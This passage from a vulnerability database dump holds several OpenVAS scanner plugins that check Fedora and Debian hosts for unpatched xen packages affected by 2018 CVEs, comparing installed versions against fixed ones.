later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874189\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-03-14 08:37:51 +0100 (Wed, 14 Mar 2018)\");\n script_cve_id(\"CVE-2018-7540\", \"CVE-2018-7541\", \"CVE-2018-7542\");\n script_tag(name:\"cvss_base\", value:\"6.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for xen FEDORA-2018-c553a586c8\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"xen on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-c553a586c8\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EON2NY7TTGVGFRL4CFQGVPUCGIDVKO42\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.9.1~5.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.1, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2019-05-29T18:33:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7540", "CVE-2018-7542", "CVE-2018-7541"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-03-21T00:00:00", "id": "OPENVAS:1361412562310874259", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874259", "type": "openvas", "title": "Fedora Update for xen FEDORA-2018-0746dac335", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_0746dac335_xen_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for xen FEDORA-2018-0746dac335\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874259\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-03-21 15:11:29 +0100 (Wed, 21 Mar 2018)\");\n script_cve_id(\"CVE-2018-7540\", \"CVE-2018-7541\", \"CVE-2018-7542\");\n script_tag(name:\"cvss_base\", value:\"6.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for xen FEDORA-2018-0746dac335\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"xen on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-0746dac335\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BGRVYJZOR6DZ26U3INZ7MMCY6DDQSG65\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.8.3~3.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.1, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2019-07-04T18:56:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7540", "CVE-2018-7542", "CVE-2018-7541"], "description": "Multiple vulnerabilities have been discovered in the Xen hypervisor:\n\nCVE-2018-7540\nJann Horn discovered that missing checks in page table freeing may\nresult in denial of service.\n\nCVE-2018-7541\nJan Beulich discovered that incorrect error handling in grant table\nchecks may result in guest-to-host denial of service and potentially\nprivilege escalation.\n\nCVE-2018-7542\nIan Jackson discovered that insufficient handling of x86 PVH guests\nwithout local APICs may result in guest-to-host denial of service.", "modified": "2019-07-04T00:00:00", "published": "2018-03-04T00:00:00", "id": "OPENVAS:1361412562310704131", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704131", "type": "openvas", "title": "Debian Security Advisory DSA 4131-1 (xen - security update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4131-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704131\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2018-7540\", \"CVE-2018-7541\", \"CVE-2018-7542\");\n script_name(\"Debian Security Advisory DSA 4131-1 (xen - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-04 00:00:00 +0100 (Sun, 04 Mar 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4131.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"xen on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), these problems have been fixed in\nversion 4.8.3+comet2+shim4.10.0+comet3-1+deb9u5.\n\nWe recommend that you upgrade your xen packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/xen\");\n script_tag(name:\"summary\", value:\"Multiple vulnerabilities have been discovered in the Xen hypervisor:\n\nCVE-2018-7540\nJann Horn discovered that missing checks in page table freeing may\nresult in denial of service.\n\nCVE-2018-7541\nJan Beulich discovered that incorrect error handling in grant table\nchecks may result in guest-to-host denial of service and potentially\nprivilege escalation.\n\nCVE-2018-7542\nIan Jackson discovered that insufficient handling of x86 PVH guests\nwithout local APICs may result in guest-to-host denial of service.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libxen-4.8\", ver:\"4.8.3+comet2+shim4.10.0+comet3-1+deb9u5\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libxen-dev\", ver:\"4.8.3+comet2+shim4.10.0+comet3-1+deb9u5\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libxenstore3.0\", ver:\"4.8.3+comet2+shim4.10.0+comet3-1+deb9u5\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-hypervisor-4.8-amd64\", ver:\"4.8.3+comet2+shim4.10.0+comet3-1+deb9u5\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-hypervisor-4.8-arm64\", ver:\"4.8.3+comet2+shim4.10.0+comet3-1+deb9u5\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-hypervisor-4.8-armhf\", ver:\"4.8.3+comet2+shim4.10.0+comet3-1+deb9u5\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-system-amd64\", ver:\"4.8.3+comet2+shim4.10.0+comet3-1+deb9u5\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-system-arm64\", ver:\"4.8.3+comet2+shim4.10.0+comet3-1+deb9u5\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-system-armhf\", ver:\"4.8.3+comet2+shim4.10.0+comet3-1+deb9u5\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-utils-4.8\", ver:\"4.8.3+comet2+shim4.10.0+comet3-1+deb9u5\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-utils-common\", ver:\"4.8.3+comet2+shim4.10.0+comet3-1+deb9u5\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xenstore-utils\", ver:\"4.8.3+comet2+shim4.10.0+comet3-1+deb9u5\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.1, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2019-07-04T18:56:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-8897", "CVE-2018-10982"], "description": "Multiple vulnerabilities have been discovered in the Xen hypervisor:\n\nCVE-2018-8897\nAndy Lutomirski and Nick Peterson discovered that incorrect handling\nof debug exceptions could result in privilege escalation.\n\nCVE-2018-10471\nAn error was discovered in the mitigations against Meltdown which\ncould result in denial of service.\n\nCVE-2018-10472\nAnthony Perard discovered that incorrect parsing of CDROM images\ncan result in information disclosure.\n\nCVE-2018-10981\nJan Beulich discovered that malformed device models could result\nin denial of service.\n\nCVE-2018-10982\nRoger Pau Monne discovered that incorrect handling of high precision\nevent timers could result in denial of service and potentially\nprivilege escalation.", "modified": "2019-07-04T00:00:00", "published": "2018-05-15T00:00:00", "id": "OPENVAS:1361412562310704201", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704201", "type": "openvas", "title": "Debian Security Advisory DSA 4201-1 (xen - security update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4201-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704201\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2018-10471\", \"CVE-2018-10472\", \"CVE-2018-10981\", \"CVE-2018-10982\", \"CVE-2018-8897\");\n script_name(\"Debian Security Advisory DSA 4201-1 (xen - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 00:00:00 +0200 (Tue, 15 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4201.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"xen on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), these problems have been fixed in\nversion 4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6.\n\nWe recommend that you upgrade your xen packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/xen\");\n script_tag(name:\"summary\", value:\"Multiple vulnerabilities have been discovered in the Xen hypervisor:\n\nCVE-2018-8897\nAndy Lutomirski and Nick Peterson discovered that incorrect handling\nof debug exceptions could result in privilege escalation.\n\nCVE-2018-10471\nAn error was discovered in the mitigations against Meltdown which\ncould result in denial of service.\n\nCVE-2018-10472\nAnthony Perard discovered that incorrect parsing of CDROM images\ncan result in information disclosure.\n\nCVE-2018-10981\nJan Beulich discovered that malformed device models could result\nin denial of service.\n\nCVE-2018-10982\nRoger Pau Monne discovered that incorrect handling of high precision\nevent timers could result in denial of service and potentially\nprivilege escalation.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\n# nb: Note that the initial DSA-4201-1 is stating that \"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\" is fixing this which is currently wrong.\nif(!isnull(res = isdpkgvuln(pkg:\"libxen-4.8\", ver:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libxen-dev\", ver:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libxenstore3.0\", ver:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-hypervisor-4.8-amd64\", ver:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-system-amd64\", ver:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-utils-4.8\", ver:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-utils-common\", ver:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xenstore-utils\", ver:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-8897", "CVE-2018-10982"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-05-16T00:00:00", "id": "OPENVAS:1361412562310874540", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874540", "type": "openvas", "title": "Fedora Update for xen FEDORA-2018-a7ac26523d", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_a7ac26523d_xen_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for xen FEDORA-2018-a7ac26523d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874540\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-16 06:05:11 +0200 (Wed, 16 May 2018)\");\n script_cve_id(\"CVE-2018-8897\", \"CVE-2018-10472\", \"CVE-2018-10471\", \"CVE-2018-10982\",\n \"CVE-2018-10981\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for xen FEDORA-2018-a7ac26523d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"xen on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-a7ac26523d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TSWYUDN5DYYW6RZXFYCOECLV6F26JJRM\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.10.1~2.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-29T20:07:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7540", "CVE-2018-7541"], "description": "Multiple vulnerabilities have been discovered in the Xen hypervisor, which\ncould result in denial of service, information leaks or privilege\nescalation.", "modified": "2020-01-29T00:00:00", "published": "2018-03-27T00:00:00", "id": "OPENVAS:1361412562310891300", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891300", "type": "openvas", "title": "Debian LTS: Security Advisory for xen (DLA-1300-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891300\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2018-7540\", \"CVE-2018-7541\");\n script_name(\"Debian LTS: Security Advisory for xen (DLA-1300-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-03-27 00:00:00 +0200 (Tue, 27 Mar 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/03/msg00003.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"xen on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n4.1.6.lts1-13.\n\nWe recommend that you upgrade your xen packages.\");\n\n script_tag(name:\"summary\", value:\"Multiple vulnerabilities have been discovered in the Xen hypervisor, which\ncould result in denial of service, information leaks or privilege\nescalation.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libxen-4.1\", ver:\"4.1.6.lts1-13\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libxen-dev\", ver:\"4.1.6.lts1-13\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libxen-ocaml\", ver:\"4.1.6.lts1-13\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libxen-ocaml-dev\", ver:\"4.1.6.lts1-13\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libxenstore3.0\", ver:\"4.1.6.lts1-13\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-docs-4.1\", ver:\"4.1.6.lts1-13\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-hypervisor-4.1-amd64\", ver:\"4.1.6.lts1-13\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-hypervisor-4.1-i386\", ver:\"4.1.6.lts1-13\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-system-amd64\", ver:\"4.1.6.lts1-13\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-system-i386\", ver:\"4.1.6.lts1-13\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-utils-4.1\", ver:\"4.1.6.lts1-13\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-utils-common\", ver:\"4.1.6.lts1-13\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xenstore-utils\", ver:\"4.1.6.lts1-13\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 6.1, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2019-05-29T18:33:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-8897", "CVE-2018-10982", "CVE-2018-3639"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-05-27T00:00:00", "id": "OPENVAS:1361412562310874611", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874611", "type": "openvas", "title": "Fedora Update for xen FEDORA-2018-5521156807", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_5521156807_xen_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for xen FEDORA-2018-5521156807\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874611\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-27 05:52:53 +0200 (Sun, 27 May 2018)\");\n script_cve_id(\"CVE-2018-3639\", \"CVE-2018-8897\", \"CVE-2018-10982\", \"CVE-2018-10981\",\n \"CVE-2018-10472\", \"CVE-2018-10471\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", 